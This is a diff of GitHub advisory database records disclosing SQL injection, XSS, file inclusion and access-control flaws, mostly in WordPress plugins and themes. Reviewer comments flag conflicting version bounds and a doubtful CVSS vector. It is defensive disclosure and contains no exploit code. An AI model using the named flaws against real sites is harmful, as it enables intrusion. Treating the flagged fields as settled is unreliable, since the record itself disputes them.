@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx85-r5h6-jm6f", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68025" + ], + "details": "Missing Authorization vulnerability in Addonify Addonify Floating Cart For WooCommerce addonify-floating-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify Floating Cart For WooCommerce: from n/a through <= 1.2.17.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68025" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/addonify-floating-cart/vulnerability/wordpress-addonify-floating-cart-for-woocommerce-plugin-1-2-17-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json b/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json new file mode 100644 index 0000000000000..ee09b0f2fd791 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5c8-59gv-v4x8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69306" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Electio Core electio-core allows Blind SQL Injection.This issue affects Electio Core: from n/a through <= 1.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69306" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/electio-core/vulnerability/wordpress-electio-core-plugin-1-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json new file mode 100644 index 0000000000000..bbe7a802209ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8fr-76pj-5h7j", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69324" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Stored XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69324" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nex-forms-express-wp-form-builder/vulnerability/wordpress-nex-forms-plugin-9-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json index 9fb7b080ef19d..6624df5aeb400 100644 --- a/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json +++ b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rf9x-x7wj-42rg", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25362" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FooPlugins FooGallery foogallery allows Stored XSS.This issue affects FooGallery: from n/a through <= 3.1.11.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:19Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json b/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json new file mode 100644 index 0000000000000..6e18ef924077c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfpg-r65c-g86m", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69408" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes HealthFirst healthfirst allows PHP Local File Inclusion.This issue affects HealthFirst: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69408" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/healthfirst/vulnerability/wordpress-healthfirst-theme-1-0-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json b/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json new file mode 100644 index 0000000000000..01cfa74bf1647 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhvr-p49q-rhmm", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22375" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Impacto Patronus impacto-patronus allows PHP Local File Inclusion.This issue affects Impacto Patronus: from n/a through <= 1.2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22375" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/impacto-patronus/vulnerability/wordpress-impacto-patronus-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json b/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json new file mode 100644 index 0000000000000..e9212e5fdb578 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjh6-2p75-696h", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-56208" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in desertthemes NewsMash newsmash allows Stored XSS.This issue affects NewsMash: from n/a through <= 1.0.71.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56208" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/newsmash/vulnerability/wordpress-newsmash-theme-1-0-71-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json b/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json new file mode 100644 index 0000000000000..b0fa0302552e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm7g-73m3-759p", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68564" + ], + "details": "Missing Authorization vulnerability in sendy Sendy sendy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sendy: from n/a through <= 3.4.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68564" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/sendy/vulnerability/wordpress-sendy-plugin-3-2-7-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json b/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json new file mode 100644 index 0000000000000..4c35f4822bb33 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json 
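Review bot: The affected-version bound in `details` for GHSA-rm7g-73m3-759p ("from n/a through <= 3.4.2") does not agree with the version in the Patchstack reference slug (`wordpress-sendy-plugin-3-2-7-broken-access-control-vulnerability`). Because `"affected": []` is empty, this free text is the only version information a consumer has. The two values should be reconciled against the referenced advisory before a structured range is added. Until then, neither number should be relied on as the boundary of the affected range.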
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmj8-x3h3-24rh", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69310" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Woodly Core woodly-core allows Blind SQL Injection.This issue affects Woodly Core: from n/a through <= 1.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69310" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woodly-core/vulnerability/wordpress-woodly-core-plugin-1-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json new file mode 100644 index 0000000000000..402424f7c9e0e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json 
@@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rp93-gq4p-8r62", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26724" + ], + "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the selectgroup and gn parameters on the /?Function=Groups endpoint.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26724" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26724" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json b/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json new file mode 100644 index 0000000000000..fb0bbd45281e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr5c-93pp-mqfv", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67996" + ], + "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Nestin nestin allows Object Injection.This issue affects Nestin: from n/a through < 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67996" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/nestin/vulnerability/wordpress-nestin-theme-1-2-6-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json b/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json new file mode 100644 index 0000000000000..445ebb98c7a24 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr5p-xfmq-r2vx", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26101" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26101" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26101" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json b/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json new file mode 100644 index 0000000000000..a8fbbf99315da --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json 
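Review bot: The CVSS v4 vector in GHSA-rr5p-xfmq-r2vx begins `CVSS:4.0/AV:L/...` (local attack vector), while `details` says the issue is triggered "via a crafted network request". One of the two is probably imprecise; the request may target a service reachable only locally, but that cannot be told from this record. The `"severity": "HIGH"` label presumably follows from the vector. The vector should therefore be checked against the referenced Nozomi Networks advisory before the record is used for exposure-based prioritisation.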
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrpc-76pm-5w54", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69373" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in beeteam368 VidoRev vidorev allows PHP Local File Inclusion.This issue affects VidoRev: from n/a through <= 2.9.9.9.9.9.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69373" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/vidorev/vulnerability/wordpress-vidorev-theme-2-9-9-9-9-9-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json new file mode 100644 index 0000000000000..497b1d0b4d452 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv4c-25xc-4f6g", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68848" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anmari amr cron manager amr-cron-manager allows Reflected XSS.This issue affects amr cron manager: from n/a through <= 2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68848" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/amr-cron-manager/vulnerability/wordpress-amr-cron-manager-plugin-2-3-reflecte-dcross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json b/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json new file mode 100644 index 0000000000000..69901b8ba53d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rvcv-xmp5-qv44", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69401" + ], + "details": "Authentication Bypass by Spoofing vulnerability in mdalabar WooODT Lite byconsole-woo-order-delivery-time allows Identity Spoofing.This issue affects WooODT Lite: from n/a through <= 2.5.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69401" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/byconsole-woo-order-delivery-time/vulnerability/wordpress-wooodt-lite-plugin-2-5-2-payment-bypass-vulnerability-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json b/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json new file mode 100644 index 0000000000000..bffeaa2077aab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw2x-9m7j-wvrx", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69383" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Agence web Eoxia - Montpellier WP shop wpshop allows PHP Local File Inclusion.This issue affects WP shop: from n/a through <= 2.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69383" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wpshop/vulnerability/wordpress-wp-shop-plugin-2-6-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json new file mode 100644 index 0000000000000..f4067b6fd2983 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw5q-r997-qm48", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69389" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hugh Mungus Visitor Maps Extended Referer Field visitor-maps-extended-referer-field allows Reflected XSS.This issue affects Visitor Maps Extended Referer Field: from n/a through <= 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69389" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/visitor-maps-extended-referer-field/vulnerability/wordpress-visitor-maps-extended-referer-field-plugin-1-2-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json index 94f7243bbb7de..7b4e0d6fbabbf 100644 --- a/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json +++ b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rw72-9mv7-cr6q", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25343" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS wp-sms allows DOM-Based XSS.This issue affects WP SMS: from n/a through <= 7.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json b/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json new file mode 100644 index 0000000000000..e5740935841bc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxjp-cgw5-jfcg", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26049" + ], + "details": "The web management interface of the device renders the passwords in a \nplaintext input field. The current password is directly visible to \nanyone with access to the UI, potentially exposing administrator \ncredentials to unauthorized observation via shoulder surfing, \nscreenshots, or browser form caching.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26049" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json b/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json new file mode 100644 index 0000000000000..4ccc37f3ebb29 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v36c-x4c4-8wx6", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68022" + ], + "details": "Missing Authorization vulnerability in soporteblue Plugin BlueX for WooCommerce bluex-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Plugin BlueX for WooCommerce: from n/a through <= 3.1.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68022" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bluex-for-woocommerce/vulnerability/wordpress-plugin-bluex-for-woocommerce-plugin-3-1-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json new file mode 100644 index 0000000000000..728988ddf6b00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v534-r4rj-rcvf", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68845" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aThemeArt Translations eDS Responsive Menu eds-responsive-menu allows Reflected XSS.This issue affects eDS Responsive Menu: from n/a through <= 1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68845" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/eds-responsive-menu/vulnerability/wordpress-eds-responsive-menu-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + 